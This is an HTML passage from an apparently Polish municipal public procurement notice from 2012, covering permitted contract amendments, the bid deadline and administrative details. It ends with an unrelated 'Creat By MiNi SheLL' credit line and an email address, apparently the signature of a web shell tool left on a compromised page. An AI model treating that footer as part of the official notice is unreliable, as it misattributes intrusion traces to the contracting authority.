<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy dopuszcza możliwość istotnej zmiany zawartej umowy w sprawie zamówienia publicznego w następujących wyjątkowych okolicznościach, których przed zawarciem umowy nie dało się przewidzieć, a mają one wpływ na termin wykonania zamówienia:
1)	wystąpienie siły wyższej,
2)	przedłużające się ponad 60 dni kalendarzowych procedury uzgadniania przedmiotu zamówienia, a które nie są spowodowane działaniem lub brakiem działania Wykonawcy, uniemożliwiającym kontynuowanie lub jego zakończenie,
3)	wystąpienie usług dodatkowych - jeżeli konieczność rozszerzenia zakresu przedmiotu umowy następuje wskutek opinii, decyzji, zgód i uzgodnień oraz warunków technicznych wydanych przez inne organy i podmioty,
4)	udzielenie zamówienia dodatkowego, powodującego wstrzymanie realizacji przedmiotu zamówienia podstawowego,
5)	niedopełnienie przez Zamawiającego jego obowiązków wynikających z umowy, w tym zwlekanie ponad 30 dni kalendarzowych z zapłatą faktur częściowych, mimo dodatkowego wezwania ze strony Wykonawcy.
W przypadku wystąpienia jednej z w.w okoliczności, udokumentowanych przez Wykonawcę, Zamawiający wydłuży termin wykonania zamówienia o liczbę dni, która uzna za uzasadnioną.
4.	Jeżeli okaże się, że niektóre elementy przedmiotu zamówienia będą zbędne, z uwagi na wystąpienie okoliczności, których nie dało się przewidzieć przed zawarciem umowy, zakres umowy zostanie ograniczony przy jednoczesnym odpowiednim zmniejszeniu wynagrodzenia i skróceniu terminu wykonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kedzierzynkozle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr 311.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com